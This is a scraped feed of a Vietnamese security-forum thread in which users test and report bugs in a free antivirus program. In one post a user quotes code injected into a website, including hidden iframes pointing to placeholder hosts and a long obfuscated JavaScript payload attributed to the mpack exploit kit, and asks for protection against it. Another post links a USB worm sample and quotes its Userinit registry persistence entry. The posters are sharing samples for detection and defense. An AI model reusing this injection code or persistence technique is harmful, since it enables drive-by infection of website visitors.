Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#69846 /hvaonline/posts/list/10351.html#69846 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#69926 /hvaonline/posts/list/10351.html#69926 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#69957 /hvaonline/posts/list/10351.html#69957 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70050 /hvaonline/posts/list/10351.html#70050 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70066 /hvaonline/posts/list/10351.html#70066 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70115 /hvaonline/posts/list/10351.html#70115 GMT Re: Thử nghiệm chương trình diệt Virus mới
]]>
/hvaonline/posts/list/10351.html#70145 /hvaonline/posts/list/10351.html#70145 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70156 /hvaonline/posts/list/10351.html#70156 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70258 /hvaonline/posts/list/10351.html#70258 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70261 /hvaonline/posts/list/10351.html#70261 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70273 /hvaonline/posts/list/10351.html#70273 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#70313 /hvaonline/posts/list/10351.html#70313 GMT Re: Thử nghiệm chương trình diệt Virus mới Lê Vũ Hoàng sài được đóa, em down vể sài thử thấy ngon phết. Mong rằng pác ngày càng hoàn thiện để nó pro hơn nữa :mrgreen: :mrgreen: :mrgreen: ]]> /hvaonline/posts/list/10351.html#71104 /hvaonline/posts/list/10351.html#71104 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#71155 /hvaonline/posts/list/10351.html#71155 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#71217 /hvaonline/posts/list/10351.html#71217 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74036 /hvaonline/posts/list/10351.html#74036 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74210 /hvaonline/posts/list/10351.html#74210 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74233 /hvaonline/posts/list/10351.html#74233 GMT Re: Thử nghiệm chương trình diệt Virus mới Code:
Runtime error (at 1:624):
SWbemObjectEx : the service cannot be started
thử đổi priority thành thấp để chạy được trong lúc các chương trình khác đang chạy]]>
/hvaonline/posts/list/10351.html#74246 /hvaonline/posts/list/10351.html#74246 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74254 /hvaonline/posts/list/10351.html#74254 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74286 /hvaonline/posts/list/10351.html#74286 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74471 /hvaonline/posts/list/10351.html#74471 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74480 /hvaonline/posts/list/10351.html#74480 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74484 /hvaonline/posts/list/10351.html#74484 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74527 /hvaonline/posts/list/10351.html#74527 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#74598 /hvaonline/posts/list/10351.html#74598 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#75193 /hvaonline/posts/list/10351.html#75193 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#75856 /hvaonline/posts/list/10351.html#75856 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76003 /hvaonline/posts/list/10351.html#76003 GMT Re: Thử nghiệm chương trình diệt Virus mới <iframe src='http://xxx.yyy.zzz.aaa/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>  Sau đó tui lại tò mò download từ từ các file .php từ cái địa chỉ xyz đó về máy để coi thử nội dung, tui lại thấy một file index.php có nội dung
<iframe src="http://bbb.ccc.ddd.eee/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> 
Tiếp tục download tiếp cái file go.php đó ra coi, tui thấy một file index.php khác có chứa một dòng mã, mà tui đã thấy qua 1 lần.
<script language=JavaScript>function decipher(x)var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,8,55,5,58,30,38,22,7,29,0,0,0,0,0,0,37,59,23,2,56,13,60,15,39,11,36,21,32,62,9,53,52,10,48,34,49,6,45,35,27,12,3,0,0,0,0,31,0,0,1,50,43,42,16,28,41,4,61,24,25,40,17,54,19,57,26,47,46,14,51,44,18,20,33);for(j=Math.ceil(l/b);j>0;j--)r='';for(i=Math.min(l,b);i>0;i--,l--)w|=(t[x.charCodeAt(p++)-48])<<s;if(s)r+=String.fromCharCode(165^w&255);w>>=8;s-=2elses=6document.write(r)decipher("3S4dlo5FmHM6mMr6VZuqzsNes6lFw8_4LslDaWwc37ETCZg6QUGATHuDXS4dlekALp5DXS4dl5t4zv_z78E2NZY68UYv7B9civjHIdFca_D6mMQes6NTKB9ca89zi_VTEvFPaWqzE89PK0hSQoN@IcNJIxlJgtD@xemcn2wS1X9@7xN@IMYTB_kzUdgRa_YT7ZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89v87mTQ8YRk5kFiAYRO_EvpvgcaIYR7smTNpwO7_kzxvgRn2Y6y7kzEZYvC2gPkxq6mMr6KpFOiWgzIpYcaWqzmdgRfHYROpgPE_kzppgcfZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89vQQYRnskOEBV6QB9Pk6wci8FzXS4dle1TKB9ca8j6mMQes6lDwG_zY8Y685GR1dgPad_AQX9P8tlvn89O_emS9xqSgCqSyUNHI5hJQegPEdmRa8jSK2gOregOnWlcQpgRlekDwG06mMQes6hj6_GAO8_zNpFcCZETCZY68u0qoXFOYB9P8tNes7kz3S4d37kz37kz6dFc789z7XjRWdM4TXG6B7Nes7kz37kz37kz37kz3S4d37kz37kzzvYc37mc28tjmMrz37kz37kDYWgz3eg0mH5AT8_jmMrz37kz37kDYWgz3eFDodues7kz37kz3Uuv1BkzQIsjEZgcNW4d37kz37kzzvYc37mco2YRNHYqKB9zmMrz37kz371es7kz37kz3Uuv1BkzcvFczvFOmMrz37kz37kDYWgz3C52asuT1ZYes7kz37kz3Uuv1BkzjW54HdgRgW4d37kz37kzzvYc37kjNZVRYsFDYHYRmMrz37kz37kDYWgz3rFqg8ERmMrz37kz37kDYWgz3eMTGsuT1ZYes7kz37kz3Uuv1Bkze_FvO_VcCW4dmMrz37kz37kDYWgz3SuP78ED9ZwTf8ERbW4dmMrz371AZBDciGEvCpgPQ_jSiB9OdpYcaWqzmvwTBdwOQGgP3cMcnZFOIZgP3C52KHwcBZFO87kFEZFcmMQes7kz37kz3SuP78ED9ZwTf8ERbB1637lzmMQes7kz37kz3StcbZ9cad_ji89vk5GR1dgPad_AQX9PIcFcIZFOTZg2nW4d37kz37kzcvFceXG6SZgP4IGvId0Fa_VOYdFcmMrz371es7kz37kz3rGRNZwTnBmqiXER3QGvIdtj3S4d37kz37kz37kz37kz3ruT7Zgz8cNJ871es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7Zgz8t5F8S4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWN@mMrz37kz37kz37kz37kz6pwOaBDzgoqzmMrz37kz37kz37kz37kz37kzmZVOnZ52aXYPnZgRkxNes7kz37kz37kz37kz37mqiXER3514L_1es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7ZgzLHwOaW4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWl@37kzmMrz37kz371DI8gzoZgcaXgPmMrz3S4d37kz37kzwGgz3SuP78ED9ZwTf8ERbWN@3U_vasYes7kz37kz37kz37kz2pFcbdYcY0ERmMQes7kz37kz37kz37kzL2ERdpYcaWhDasYRBpgPasuT1ZgWYS4d37kz37kz37kz371D9ZF4iWYRkC52asuT1ZgzZ7DzICg2a_1es71es7kz37kz37kz37kzoZgP37mc28tjkUwcUZEcasgPIrFOapgPaZ5caWYRI89W8eFTGZwTn_1W3S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzY8FzN5mc28tj8S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzUHYT7XEvb_kS8rgc7vgR_55DguhqfCqJ1uNJJXNSyxlDKS1H9rNq17l@6BlJWXM@gCt@p51es7kz37kz3S4d37kz37kz37kz37mja89zQX_vaHgcJB9O3SlzQ__DosmqBZYTnZw480YRU89W8r_vaHgcIx5OKHYvUpgPYdFc86Dz8c1es7kz37kz37kz37kzoZgP3eFDQHgRa_9zk7mco2YRNHYqKBjSdpYcaX_OiXYRErVOZGt4d8sjYS4d37kz37kz37kz37mja89zQGtcN8YRBv5PaWY6QGtcN8YRBskji_VOasuT1ZgW8rG21_wcNskPnGFzYS4d37kz37kz37kz37DDQsgP4BGTn2wM6dYcKdFcasgP7WhjKHYvn2mcWdgcbZFOw8ER1skji89vN5kM861Sy61@YS4d37kz37kz37kz37mFYsgDY_E63utcI8VMOpgPEdsqQWgOQsYRI8VOE7NW3ukz860z3ukz3utcI8VMOpgPEdsqQWgOQsYRI8VOExNW3ukz860zmMrz37kz37kz37kz3C52asuT1ZY6cvFczvFO3ukzL2ERdpYcaW4d37kz37kz37kz37kz37kz37kzmMrz37kz37kz37kz3eMTGsuT1ZY68SuvU_Vc7dFRn_1es7kz37kz37kz37kze_FvO_VcCWqzjW54V8_FO_1es7kz37kz37kz37kz7ZgP3eg0mH5AT8_j3Slz6_ERi8ERe_FvaXgPEeMTGsuT1ZgzZ7DzI5kzZ7m480gjBdwRYS4d37kz37kz37kz37DjapVMnv9OaWqzS_kzZ7DzL_kzZ7DzT_1es7kz37kz37kz37kzV8_FOXGR7XEvQsY6Q2G4h25FTB0SeBERI2DjapVMTv9OaH14Q8YPNZwMOpgPEHk@YS4d37kz37kz37kz37mcjW54V8_FOsmjasgREckzmMrz37kz37kz37kz3eMc3CMOBdFO35GR7ZEcaBD4a29PmMrz37kz37kz37kz3oG4h_tcbvE6Q2G4h25FTB0SBZwOKdFc7ZFqQ8Y2mMrzmMrz37kz37kz37kz3utjed0ciWYRk5mjU_EvK8EvIIFz3ukz8tDz3ukz8uuvNZwjgX9PaWw480YRU8jzmMrz37kz37kz37kz3rGRnBmcWXs4keFjzX0S6_ERi8ERe_FvaXgPEutjed0ciWYRN5DzYS4d37kz37kz37kz37mja89zOHYPCvFcWvgcaWhcWXs4IrMOapgPa8GR98jDYHYREC52asuT1ZgS3U0jRZuWmMrz37kz37kz37kz37_cfIYvIdsOY0ERk6uRI_5WjW54HdgRgv1esS4d37kz37kz37kz37DDQ_9zGWN@3Usc37_cfIYvIdsOY0ER3S4d37kz37kz37kz37kz37kz3rFqg8ERkSuvb_5WjW54HdgRgHDvNxNWmMrz37kz37kz37kz37kz37kzHv9PaXtcbZY6JXVTH2mTHv9Pav1es7kz37kz37kz37kz37kz37kjNZVRYsFDYHYRIQ0OY8EREr5vB2Dqg8ER6dgRav1WmMrz37kz37kz37kz3tuR98Ees7kz37kz37kz37kzOHYPCvFcWvgcasmqNdwOaW4d37kz37kz3S4d37kz37kz37kz37mja89z3ewFo2YRNHY6Q__DosmqBZYTnZw480YRU89W8QsjU_EvK8jSo2YRNHFzN5DzYS4d37kz37kz37kz37m4IB1DB_VcBBDjaXEP1ZgzdZg2nW4d37kz37kz37kz37mccX_vaHgcI5GPIBkWL2ERdpYcavkSy6DDJHtjLW4dmMrz37kz371DI8gzwGgzmMQes7kz3CMcbB1AZW4dmM4DfswTnvwcIBmDa8VMcvFc4GGRBXEvQsgWYS4dmMrz37kz3cuDpZFO7vwcIWqciGEvCpgPQ_jSiB9OvZFO7vwcIW4d37kz371AZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zgCqzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzgCqzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zn51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck5D4T_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFc3cl23UqSg51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck514L_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7B1H951W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck51H951es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7BD4TB1JI7qzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzB4MzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zft1@8ckzltlzK7kzT2YRIW4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68o_j8S4d37kz371DNXER3S4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68C0cuswcxsFzmMrz37kz3CMcbB1AZW4d37kz371esCMcbBDDfswTnvwcIW4dmM4DfswTnvwcIBmDasYRBpgPasuT1ZgWYS4dmMrz37kz35GTI8wc1suT1ZY6851es7kz37kzB_E6wsgPEoqW2sgRYS4d37kz371vuWl@mMrz37kz3UtcmMrz37kz37kz3cYvkcMcn2D@fMDjI8YWuchJmMrz37kz37kz35GTI8wc1suT1ZY62pFcbdYcdpYcaAmqE_9WYvYWmMrz37kz37kz3cwvkcwvuxNes7kz37kzhdwcKBmFEvgcaB1vuHqOBW4d37kz37mDasYRBpgPasuT1ZY62pFcbdYcdpYcaW4dmMQDI8gzWZjcU8EvQsYes7kz3S4dlemj6_GAO806mMr6Q5t4zv06mMr6Qo5FmHM6mMQ")</script>  
Tới ngang đây, do giới hạn hiểu biết, tui không biết cái thông tin gì được lấy về từ một nơi nào đó trên internet .... Thông tin hack này từ lần trước khi hỏi mod về mpack, cách thức người tấn công sử dụng mpack nhét thêm vào source code của trang web.... Vậy mod có cải tiến chức năng của phần mềm FH để luột, ngăn không thực hiện cái đoạn code của mpack, cái đoạn code thực thi các index.php, go.php, ... Các phần mềm diệt malware khác đều detect ra cái file index.php có chứa cái đoạn kinh dị trên. Tui chưa tìm hiểu nhiều về lập trình,lập trình ngôn ngữ web, bà con và mod thông cảm. ]]>
/hvaonline/posts/list/10351.html#76022 /hvaonline/posts/list/10351.html#76022 GMT
Thử nghiệm chương trình diệt Virus mới

bgate wrote:
hic anh Hoàng ơi chiều này máy nhà em update cái Fasthelp và quét,được một lúc thì nó báo lỗi:"external exception C0000024". ah,còn 1 vấn đề nữa là hồi đầu khi cài fasthelp nếu bật bitdefender 10 thì không cài được còn nếu tắt đi thì cài được  
Hoàng đã update lên bản 5.3.5, remove script System Restore nên sẽ work với máy bạn. @Mr.Vampire: Tải bản 5.3.5 về rồi add nó vào Chứng thực lão :D. @MH: Theo mặc định thì disable autorun, bạn có thể chỉnh lại bằng cách vào mục Cấu hình. @tmd: Mỗi khi IE thực thi thì nó báo đó tmd :D. to all: Phiên bản 5.3.5 đã có, bác bạn down về thử xem :D]]>
/hvaonline/posts/list/10351.html#76070 /hvaonline/posts/list/10351.html#76070 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76126 /hvaonline/posts/list/10351.html#76126 GMT Thử nghiệm chương trình diệt Virus mới

nolateforbegin wrote:
Hi, em tải về dùng bản 5.3.5 rồi nhưng có cái lỗi "kỳ kỳ" :D), thứ nhất là phải add updater của boom vào (cái này ko sao), nhưng em ghi CD 2 cái software xong chạy nó thì không được (chưa thử cái khác), nó chỉ hiện ra 1 cửa sổ explorer mới trỏ đến ổ CD nữa. Em đoán là do cái FH nên tắt thử thì chạy bình thường, hay là tại anh đặt sờ-cu-ri-ty hơi cao :D) 
Ah, là do trên đĩa CD của nolateforbegin có autorun.inf để tự chạy chứ gì ? nolateforbegin vào phần Cấu Hình, chọn mục Khi có một ứng dụng AutoPlay thực thi. Đặt lại chế độ cho phép hoặc hỏi người dùng mỗi khi autorun.inf được chạy. Hoàng làm chức năng này để chống mấy loại malware lây qua đường flash drive. Khi gắn Flash Drive vào, nếu malware được thực thi thì chương trình sẽ báo.]]>
/hvaonline/posts/list/10351.html#76222 /hvaonline/posts/list/10351.html#76222 GMT
Thử nghiệm chương trình diệt Virus mới http://www.freefileupload.net/file.php?file=files/020807/1186072814/killVBS.rar Y chang một loại worm bình thường, lây lan tè le qua usb. Loại .vbs này hiện tại nhiều lắm, chưa kể các loại .js... khác. PS : cái key này nó thêm vào registry. FH của mod ghi nhận được.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=C:\WINDOWS\system32\userinit.exe, -> C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs 
]]>
/hvaonline/posts/list/10351.html#76388 /hvaonline/posts/list/10351.html#76388 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76401 /hvaonline/posts/list/10351.html#76401 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76467 /hvaonline/posts/list/10351.html#76467 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76624 /hvaonline/posts/list/10351.html#76624 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76843 /hvaonline/posts/list/10351.html#76843 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#76899 /hvaonline/posts/list/10351.html#76899 GMT Thử nghiệm chương trình diệt Virus mới

nolateforbegin wrote:
Hi anh, 2 cái đó không có autorun, em chép theo dạng nguyên 2 cái thư mục: 1 là share point designer từ file iso ra nên có file autorun trong đó, thư mục còn lại là Kingsoft Office, không có autorun, hổng hiểu :(( 
hi nolateforbegin, Bạn thử tắt chế độ "Khi có một ứng dụng AutoRun" thực thi xem sao ? Nếu vẫn còn bị, bạn có thể upload file .iso đó lên không ? Nếu upload thì Hoàng sẽ setup 1 FTP cho bạn ?]]>
/hvaonline/posts/list/10351.html#76947 /hvaonline/posts/list/10351.html#76947 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#78430 /hvaonline/posts/list/10351.html#78430 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#78488 /hvaonline/posts/list/10351.html#78488 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#78699 /hvaonline/posts/list/10351.html#78699 GMT Thử nghiệm chương trình diệt Virus mới 2. Chưa thể mơ lock những khóa tron registry : task Manager , Regedit , Msconfig ... ( Nếu thêm đc những chức năng này thì khá tốt ).   Có công cụ All Tools In One kèm theo đó bạn. Cho phép mở Task Manager, Regedit... Đối với loại virus nào khoá Task Manager, Regedit... chương trình sẽ tự động unlock ra.
Nếu có thêm thông tin gì mình sẽ send mẫu cho !! xin ủng hộ 2 tay 2 chân ...  
Thank bạn trước :)]]>
/hvaonline/posts/list/10351.html#78772 /hvaonline/posts/list/10351.html#78772 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#82707 /hvaonline/posts/list/10351.html#82707 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#83549 /hvaonline/posts/list/10351.html#83549 GMT Re: Thử nghiệm chương trình diệt Virus mới http://img480.imageshack.us/img480/4408/thongbaoloioh5.jpg [URL=http://img480.imageshack.us/my.php?image=thongbaoloioh5.jpg]
[/URL]]]>
/hvaonline/posts/list/10351.html#83679 /hvaonline/posts/list/10351.html#83679 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#83687 /hvaonline/posts/list/10351.html#83687 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#83845 /hvaonline/posts/list/10351.html#83845 GMT Re: Thử nghiệm chương trình diệt Virus mới Mình thường sử dụng chương trình autocad và khi chép file từ ổ USB của các bạn khác thì hay bị nhiễm virus ALS/Bursted   Bạn có thể upload cho Hoàng mẫu malware đó để cập nhật vào chương trình không ?]]> /hvaonline/posts/list/10351.html#83875 /hvaonline/posts/list/10351.html#83875 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#85266 /hvaonline/posts/list/10351.html#85266 GMT Re: Thử nghiệm chương trình diệt Virus mới

BluePhoenix wrote:
@Hoang Đúng là link ko dùng đc anh ơi. Post lại cái ko đi được ko? 
Link gì không dùng được hả bạn, bạn có thể download 1 trong 2 link sau: http://fasthelper.fire-lion.com/download/FastHelperSetup.exe http://fasthelper.vnsi4h.com/download/FastHelperSetup.exe]]>
/hvaonline/posts/list/10351.html#85272 /hvaonline/posts/list/10351.html#85272 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#85280 /hvaonline/posts/list/10351.html#85280 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#85989 /hvaonline/posts/list/10351.html#85989 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#86041 /hvaonline/posts/list/10351.html#86041 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#86173 /hvaonline/posts/list/10351.html#86173 GMT Re: Thử nghiệm chương trình diệt Virus mới Tuy nhiên sao ko Uninstall đc vậy ,xóa các files của chương trình của bạn cũng ko đc.   Bạn có thể nêu rõ cụ thể không install được như thế nào không ? Trên Start Menu và Add Remove Program đều có phần uninstall.
Với lại khi minh mở file .exe,.inf (từ CD)nó hiên ra 1 thông báo,mình click "Ok" hay "Cancel" gì thì nó cũng ko cho thực thi đc=> "Thông báo đó là vô nghĩa",Còn nếu mà muốn cảnh báo cho người dùng biết ko nên mở files đó thì nên đưa ra 1 cái "Warning !!!" thì hay hơn chứ!!!,và cái "Warning...!!" đó cũng nên chỉ cho người dùng thấy cách thức đề mở file vừa đc cảnh báo.  
Không biết có trục trặc gì ở máy bạn không chứ ở bảng thông báo, bạn có thể nhấn OK để thực hiện file autorun. Ngoài ra, bạn có thể vào options chỉnh lại.]]>
/hvaonline/posts/list/10351.html#86259 /hvaonline/posts/list/10351.html#86259 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#86260 /hvaonline/posts/list/10351.html#86260 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#87387 /hvaonline/posts/list/10351.html#87387 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#87444 /hvaonline/posts/list/10351.html#87444 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#87668 /hvaonline/posts/list/10351.html#87668 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#87684 /hvaonline/posts/list/10351.html#87684 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#93753 /hvaonline/posts/list/10351.html#93753 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#93785 /hvaonline/posts/list/10351.html#93785 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#93934 /hvaonline/posts/list/10351.html#93934 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#95988 /hvaonline/posts/list/10351.html#95988 GMT Re: Thử nghiệm chương trình diệt Virus mới
* Anh Hoàng, tại sao khi vào TaskManager: _ Nếu FireLion đang chạy, thì em thấy 2 thằng process này chạy (như hình) _ Còn nếu tắt FireLion đi, thì 2 thằng ấy hết chạy. * Và FireLion chạy thường trực thế có hơi bị tốn CPU ko anh :D?]]>
/hvaonline/posts/list/10351.html#96351 /hvaonline/posts/list/10351.html#96351 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#96364 /hvaonline/posts/list/10351.html#96364 GMT Re: Thử nghiệm chương trình diệt Virus mới taskmgr và explorer đương nhiên phải có. _ Ở đây ý em muốn nói là: * Khi không có FireLion thì taskmgr xài CPU khoảng từ 0-2, còn explorer gần như hoàn toàn là 0 (nghỉ ngơi) * Còn khi có FireLion (như anh thấy ở hình), taskmgr xài CPU khoảng từ 6-8, còn explorer cố định ở 2 hoặc có khi cao hơn. Nếu anh đồng ý với em rồi thì cho em hỏi : FireLion nó bắt 2 process kia làm việc gì mà cật lực vậy anh :D]]> /hvaonline/posts/list/10351.html#96376 /hvaonline/posts/list/10351.html#96376 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#96690 /hvaonline/posts/list/10351.html#96690 GMT Re: Thử nghiệm chương trình diệt Virus mới @Angel_A Bạn ui, ở trên mình có nói chỗ nào là chạy hay không chạy đâu. Mình chỉ hỏi về vấn đề xài CPU nhiều hay ít thôi mà.]]> /hvaonline/posts/list/10351.html#96736 /hvaonline/posts/list/10351.html#96736 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#96766 /hvaonline/posts/list/10351.html#96766 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#96849 /hvaonline/posts/list/10351.html#96849 GMT Re: Thử nghiệm chương trình diệt Virus mới
@Ricky1990: Dĩ nhiên là thua Kaspersky, Bit Defender hay ngay cả BKAV về mặt số lượng virus, cập nhật mẫu vì họ có đội ngũ thường trực để cập nhật virus. Hoàng chỉ có thể làm trong khả năng mà thôi :)]]>
/hvaonline/posts/list/10351.html#96894 /hvaonline/posts/list/10351.html#96894 GMT
Re: Thử nghiệm chương trình diệt Virus mới FireLion có thể thêm chức năng này không anh? Đó là: _ Có 1 Black List, mình có thể chủ động đưa bất kì File với bất kì định dạng nào vô đó. _ Khi những File bị đưa vào đó, sẽ không thể được thực thi dưới mọi hình thức. _ Với 1 lý do nào đó, khi tắt FireLion đi, thì những File nằm trong Black List đó cũng không thể được thực thi. _ Và nếu có 1 chương trình nào đó kêu gọi nó ra để thực thi, thì FireLion chặn lại và có nhiệm vụ đưa ra thông báo rõ ràng là: chương trình nào (gồm các File .exe và .dll v.v...) đang gọi những File nằm trong Black List ra để thực thi. Song song đó là có các tùy chọn : "có thực thi hay không" "ghi nhớ luôn thao tác hỏi đó đối với File đó" và "kê ra danh sách đường dẫn những File có liên quan".]]> /hvaonline/posts/list/10351.html#97168 /hvaonline/posts/list/10351.html#97168 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97271 /hvaonline/posts/list/10351.html#97271 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97276 /hvaonline/posts/list/10351.html#97276 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97318 /hvaonline/posts/list/10351.html#97318 GMT Re: Thử nghiệm chương trình diệt Virus mới

kamikazeq wrote:
Anh Hoàng, em có ý kiến nho nhỏ. FireLion có thể thêm chức năng này không anh? Đó là: _ Có 1 Black List, mình có thể chủ động đưa bất kì File với bất kì định dạng nào vô đó. _ Khi những File bị đưa vào đó, sẽ không thể được thực thi dưới mọi hình thức. _ Với 1 lý do nào đó, khi tắt FireLion đi, thì những File nằm trong Black List đó cũng không thể được thực thi. _ Và nếu có 1 chương trình nào đó kêu gọi nó ra để thực thi, thì FireLion chặn lại và có nhiệm vụ đưa ra thông báo rõ ràng là: chương trình nào (gồm các File .exe và .dll v.v...) đang gọi những File nằm trong Black List ra để thực thi. Song song đó là có các tùy chọn : "có thực thi hay không" "ghi nhớ luôn thao tác hỏi đó đối với File đó" và "kê ra danh sách đường dẫn những File có liên quan". 
Liệu bạn có đề cao người dùng quá không. Trừ dân IT thực thụ, hiếm người đọc thông báo. Hãy đơn giản hơn về mặt suy nghĩ: có virus ->diệt, không có ->không diệt. Vậy thôi.]]>
/hvaonline/posts/list/10351.html#97339 /hvaonline/posts/list/10351.html#97339 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97351 /hvaonline/posts/list/10351.html#97351 GMT Re: Thử nghiệm chương trình diệt Virus mới Chương Trình này khá hay nhưng tôi dùng thử rồi  Bạn ui, hình như có vấn đề ở từ "nhưng" thì phải. #:S @Look2Me: Bạn ơi, ngoài dân IT thực thụ và người dùng bình thường cũng có 1 nhóm người khác là chưa hẳn là IT thực thụ nhưng cũng đã có 1 ít kiến thức nhất định và đang quan tâm đến vấn đề Virus, thì việc có thêm chức năng đó sẽ giúp ích cho họ rất nhiều. anh Hoàng mà thêm tính năng này, chắc họ thích lắm (trong đó có em nữa). :) ]]> /hvaonline/posts/list/10351.html#97393 /hvaonline/posts/list/10351.html#97393 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97837 /hvaonline/posts/list/10351.html#97837 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#97944 /hvaonline/posts/list/10351.html#97944 GMT Re: Thử 